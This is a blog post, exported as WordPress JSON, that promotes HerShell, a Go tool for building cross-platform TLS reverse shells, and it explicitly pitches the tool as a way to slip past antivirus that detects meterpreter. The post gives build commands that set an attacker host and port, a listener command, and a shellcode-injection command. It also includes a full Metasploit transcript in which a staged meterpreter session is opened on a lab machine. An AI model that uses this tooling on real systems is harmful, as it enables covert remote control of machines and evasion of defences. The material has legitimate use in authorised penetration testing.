{"id":8640,"date":"2020-01-27T21:14:07","date_gmt":"2020-01-27T15:44:07","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=8640"},"modified":"2020-01-27T21:14:07","modified_gmt":"2020-01-27T15:44:07","slug":"hershell-multiplatform-reverse-shell-generator","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/","title":{"rendered":"HerShell : Multiplatform Reverse Shell Generator"},"content":{"rendered":"\n<p><strong>Hershell <\/strong>is a tool for simple TCP reverse shell written in <a rel=\"noreferrer noopener\" aria-label=\"Go (opens in a new tab)\" href=\"https:\/\/golang.org\/\" target=\"_blank\">Go<\/a>. It uses TLS to secure the communications, and provide a certificate  public key fingerprint pinning feature, preventing from traffic  interception.<\/p>\n\n\n\n<p>Supported OS are:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Windows<\/strong><\/li><li><strong>Linux<\/strong><\/li><li><strong>Mac OS<\/strong><\/li><li><strong>FreeBSD and derivatives<\/strong><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Why?<\/strong><\/p>\n\n\n\n<p>Although meterpreter payloads are great, they are sometimes spotted by AV products. The goal of this project HerShell is to get a simple reverse shell, which can work on multiple systems.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#how-\"><\/a><\/h2>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>How?<\/strong><\/p>\n\n\n\n<p>Since HerShell is written in Go, you can cross compile the source for the desired architecture.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#getting-started--dependencies\"><\/a><\/h2>\n\n\n\n<p><strong>Getting Started &amp; Dependencies<\/strong><\/p>\n\n\n\n<p>As this is a Go project, you will need to follow the <a href=\"https:\/\/golang.org\/doc\/install\">official documentation<\/a> to set up\nyour Golang environment (with the <code>$GOPATH<\/code> environment variable).<\/p>\n\n\n\n<p>Then, just run <code><strong>go get github.com\/lesnuages\/hershell<\/strong><\/code> to fetch the project.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#building-the-payload\"><\/a><\/h3>\n\n\n\n<p><strong>Building The payload<\/strong><\/p>\n\n\n\n<p>To simplify things, you can use the provided Makefile.\nYou can set the following environment variables:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code><strong>GOOS<\/strong><\/code> : the target OS<\/li><li><strong><code>GOARCH<\/code> <\/strong>: the target architecture<\/li><li><code><strong>LHOST<\/strong><\/code> : the attacker IP or domain name<\/li><li><code><strong>LPORT<\/strong><\/code> : the listener port<\/li><\/ul>\n\n\n\n<p>For the <code><strong>GOOS<\/strong><\/code> and <strong><code>GOARCH<\/code> <\/strong>variables, you can get the allowed values <a href=\"https:\/\/golang.org\/doc\/install\/source#environment\">here<\/a>.<\/p>\n\n\n\n<p>However, some helper targets are available in the <code><strong>Makefile<\/strong><\/code>:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code><strong>depends<\/strong><\/code> : generate the server certificate (required for the reverse shell)<\/li><li><code><strong>windows32<\/strong><\/code> : builds a windows 32 bits executable (PE 32 bits)<\/li><li><strong><code>windows64<\/code> <\/strong>: builds a windows 64 bits executable (PE 64 bits)<\/li><li><strong><code>linux32<\/code> <\/strong>: builds a linux 32 bits executable (ELF 32 bits)<\/li><li><strong><code>linux64<\/code> <\/strong>: builds a linux 64 bits executable (ELF 64 bits)<\/li><li><strong><code>macos32<\/code> <\/strong>: builds a mac os 32 bits executable (Mach-O)<\/li><li><strong><code>macos64<\/code> <\/strong>: builds a mac os 64 bits executable (Mach-O)<\/li><\/ul>\n\n\n\n<p>For those targets, you just need to set the <strong><code>LHOST<\/code> <\/strong>and <strong><code>LPORT<\/code> <\/strong>environment variables.<\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong>Also Read &#8211; <a href=\"https:\/\/kalilinuxtutorials.com\/password-attacks\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"How to Protect Yourself Against Common Password Attacks (opens in a new tab)\">How to Protect Yourself Against Common Password Attacks<\/a><\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#using-the-shell\"><\/a><\/h3>\n\n\n\n<p><strong>Using the shell<\/strong><\/p>\n\n\n\n<p>Once executed, you will be provided with a remote shell.\nThis custom interactive shell will allow you to execute system commands through <code>cmd.exe<\/code> on Windows, or <code>\/bin\/sh<\/code> on UNIX machines.<\/p>\n\n\n\n<p>The following special commands are supported:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong><code>run_shell<\/code> <\/strong>: drops you an system shell (allowing you, for example, to change directories)<\/li><li><code>inject &lt;base64 shellcode&gt;<\/code> : injects a shellcode (base64 encoded) in the same process memory, and executes it<\/li><li><code><strong>meterpreter [tcp|http|https] IP:PORT<\/strong><\/code> : connects to a  multi\/handler to get a stage2 reverse tcp, http or https meterpreter  from metasploit, and execute the shellcode in memory (Windows only at  the moment)<\/li><li><strong><code>exit<\/code> <\/strong>: exit gracefully<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#usage\"><\/a><\/h2>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Usage<\/strong><\/p>\n\n\n\n<p>First of all, you will need to generate a valid certificate:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>$ make depends<\/strong><br>openssl req -subj &#8216;\/CN=yourcn.com\/O=YourOrg\/C=FR&#8217; -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem<br><strong>Generating a 4096 bit RSA private key<\/strong><br>\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026<br><strong>writing new private key to &#8216;server.key&#8217;<\/strong><br>\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026 <br> cat server.key &gt;&gt; server.pem<\/p>\n\n\n\n<p><strong>For windows:<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong># Predifined 32 bit target <\/strong><br>$ make windows32 LHOST=192.168.0.12 LPORT=1234 <br><strong># Predifined 64 bit target <\/strong><br>$ make windows64 LHOST=192.168.0.12 LPORT=1234<\/p>\n\n\n\n<p><strong>For Linux:<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong># Predifined 32 bit target <\/strong><br>$ make linux32 LHOST=192.168.0.12 LPORT=1234 <br><strong># Predifined 64 bit target <\/strong><br>$ make linux64 LHOST=192.168.0.12 LPORT=1234<\/p>\n\n\n\n<p><strong>For Mac OS X<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>$ make macos LHOST=192.168.0.12 LPORT=1234<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#examples\"><\/a><\/h2>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Examples<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#basic-usage\"><\/a><\/h3>\n\n\n\n<p><strong>Basic usage<\/strong><\/p>\n\n\n\n<p>One can use various tools to handle incoming connections, such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>socat<\/li><li>ncat<\/li><li>openssl server module<\/li><li>metasploit multi handler (with a <code><strong>python\/shell_reverse_tcp_ssl<\/strong><\/code> payload)<\/li><\/ul>\n\n\n\n<p>Here is an example with <code>ncat<\/code>:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>$ ncat &#8211;ssl &#8211;ssl-cert server.pem &#8211;ssl-key server.key -lvp 1234 <br>Ncat: Version 7.60 ( https:\/\/nmap.org\/ncat ) <br>Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 <br>Ncat: Connection from 172.16.122.105. <br>Ncat: Connection from 172.16.122.105:47814. <\/strong><br>[hershell]&gt; whoami<br>desktop-3pvv31a\\lab <\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#meterpreter-staging\"><\/a><\/h3>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Meterpreter Staging<\/strong><\/p>\n\n\n\n<p><strong>WARNING<\/strong>: this currently only work for the Windows platform.<\/p>\n\n\n\n<p>The meterpreter staging currently supports the following payloads :<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong><code>windows\/meterpreter\/reverse_tcp<\/code><\/strong><\/li><li><strong><code>windows\/x64\/meterpreter\/reverse_tcp<\/code><\/strong><\/li><li><strong><code>windows\/meterpreter\/reverse_http<\/code><\/strong><\/li><li><strong><code>windows\/x64\/meterpreter\/reverse_http<\/code><\/strong><\/li><li><strong><code>windows\/meterpreter\/reverse_https<\/code><\/strong><\/li><li><strong><code>windows\/x64\/meterpreter\/reverse_https<\/code><\/strong><\/li><\/ul>\n\n\n\n<p>To use the correct one, just specify the transport you want to use (tcp, http, https)<\/p>\n\n\n\n<p>To use the meterpreter staging feature, just start your handler:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] &gt; use exploit\/multi\/handler\n[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi\/handler) &gt; set payload windows\/x64\/meterpreter\/reverse_https\npayload =&gt; windows\/x64\/meterpreter\/reverse_https\n[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi\/handler) &gt; set lhost 172.16.122.105\nlhost =&gt; 172.16.122.105\n[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi\/handler) &gt; set lport 8443\nlport =&gt; 8443\n[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi\/handler) &gt; set HandlerSSLCert .\/server.pem\nHandlerSSLCert =&gt; .\/server.pem\n[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi\/handler) &gt; exploit -j\n[*] Exploit running as background job 0.\n\n[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https:\/\/172.16.122.105:8443\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi\/handler) &gt;<\/pre>\n\n\n\n<p>Then, in <code><strong>hershell<\/strong><\/code>, use the <strong><code>meterpreter<\/code> <\/strong>command:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>[hershell]&gt;meterpreter https 172.16.122.105:8443<\/strong><\/p>\n\n\n\n<p>A new meterpreter session should pop in <code><strong>msfconsole<\/strong><\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi\/handler) &gt;\n[*] [2018.01.29-14:16:44] https:\/\/172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...\n[*] Meterpreter session 1 opened (172.16.122.105:8443 -&gt; 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100\n\n[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi\/handler) &gt; sessions\n\nActive sessions\n===============\n\n  Id  Name  Type                     Information                            Connection\n  --  ----  ----                     -----------                            ----------\n  1         meterpreter x64\/windows  DESKTOP-3PVV31A\\lab @ DESKTOP-3PVV31A  172.16.122.105:8443 -&gt; 172.16.122.105:44804 (10.0.2.15)\n\n[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi\/handler) &gt; sessions -i 1\n[*] Starting interaction with 1...\n\nmeterpreter &gt; getuid\nServer username: DESKTOP-3PVV31A\\lab<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/lesnuages\/hershell#credits\"><\/a><\/h2>\n\n\n\n<p><strong>Credits<\/strong> : <a href=\"https:\/\/github.com\/khast3x\">@khast3x<\/a> for the Dockerfile feature<\/p>\n\n\n\n<div class=\"wp-block-button aligncenter is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/lesnuages\/hershell\"><strong>Download<\/strong><\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Hershell is a tool for simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception. Supported OS are: Windows Linux Mac OS FreeBSD and derivatives Why? Although meterpreter payloads are great, they are sometimes spotted by AV products. [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16067,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png","fifu_image_alt":"HerShell : Multiplatform Reverse Shell Generator","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[],"class_list":["post-8640","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HerShell : Multiplatform Reverse Shell Generator 2020<\/title>\n<meta name=\"description\" content=\"Hershell is a tool for simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HerShell : Multiplatform Reverse Shell Generator 2020\" \/>\n<meta property=\"og:description\" content=\"Hershell is a tool for simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2020-01-27T15:44:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"HerShell : Multiplatform Reverse Shell Generator\",\"datePublished\":\"2020-01-27T15:44:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/\"},\"wordCount\":578,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png\",\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/\",\"name\":\"HerShell : Multiplatform Reverse Shell Generator 2020\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png\",\"datePublished\":\"2020-01-27T15:44:07+00:00\",\"description\":\"Hershell is a tool for simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HerShell : Multiplatform Reverse Shell Generator 2020","description":"Hershell is a tool for simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/","og_locale":"en_US","og_type":"article","og_title":"HerShell : Multiplatform Reverse Shell Generator 2020","og_description":"Hershell is a tool for simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate","og_url":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2020-01-27T15:44:07+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"HerShell : Multiplatform Reverse Shell Generator","datePublished":"2020-01-27T15:44:07+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/"},"wordCount":578,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png","articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/","url":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/","name":"HerShell : Multiplatform Reverse Shell Generator 2020","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png","datePublished":"2020-01-27T15:44:07+00:00","description":"Hershell is a tool for simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/hershell-multiplatform-reverse-shell-generator\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png","contentUrl":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-8r6a4JhySLg\/Xi67SQTtfhI\/AAAAAAAAEnw\/K16coRzuCN8UgWjf9_eHS766PpO5FO84QCLcBGAsYHQ\/s1600\/New%25281%2529.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":2626,"url":"https:\/\/kalilinuxtutorials.com\/hershell-simple-tcp-reverse-shell\/","url_meta":{"origin":8640,"position":0},"title":"Hershell &#8211; Simple TCP Reverse Shell Which Can Work On Multiple Systems","author":"R K","date":"September 16, 2018","format":false,"excerpt":"Hershell is a simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception. Supported OS are: Windows Linux Mac OS FreeBSD and derivatives Although meterpreter payloads are great, they are sometimes spotted by\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":2689,"url":"https:\/\/kalilinuxtutorials.com\/svscanner-vulnerability-massive-exploit\/","url_meta":{"origin":8640,"position":1},"title":"SVScanner &#8211; Scanner Vulnerability And MaSsive Exploit","author":"R K","date":"September 17, 2018","format":false,"excerpt":"SVScanner is a tool for scanning and massive exploits. Our tools target several open source cms. Requirements PHP 7 (version and up) Install Modules 